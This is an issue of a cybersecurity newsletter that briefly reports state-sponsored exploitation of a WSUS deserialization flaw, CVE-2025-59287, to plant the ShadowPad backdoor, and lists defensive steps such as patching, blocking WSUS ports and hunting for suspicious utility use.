Nation-State | Patch Infrastructure Compromise

Welcome reader, here’s today’s Daily Cyber Insight.

Brought to you by:

👣 Smallstep – Secures Wi-Fi, VPNs, ZTNA, SaaS and APIs with hardware-bound credentials powered by ACME Device Attestation

 📊 LockThreat – AI-powered GRC that replaces legacy tools and unifies compliance, risk, audit and vendor management in one platform

Forwarded this email? Join 70,000 weekly readers by signing up now.

#OpenToWork? Try our AI Resume Builder to boost your chances of getting hired!

—

Access all deep dives, weekly cyber intel reports, premium research, the AI Resume Builder, and more — $299/year. Corporate plans available.

Executive Snapshot Your patch management system just became the attack surface. Chinese state-sponsored actors weaponized a WSUS deserialization flaw within hours of PoC release, gaining SYSTEM-level access to the infrastructure designed to keep your environment secure.

Signal CISA elevated CVE-2025-59287 to emergency status after observing attackers exploit unauthenticated WSUS endpoints to deploy ShadowPad backdoor via native Windows utilities that bypass endpoint detection.

Strategic Implication You trusted WSUS to distribute patches. Adversaries trusted it to distribute persistence.

Action Verify WSUS servers are patched against CVE-2025-59287 and audit all servers for ShadowPad indicators today. Block inbound traffic on TCP ports 8530 and 8531 from non-Microsoft Update sources now. Hunt for anomalous PowerShell, certutil, and curl execution patterns on WSUS hosts this week.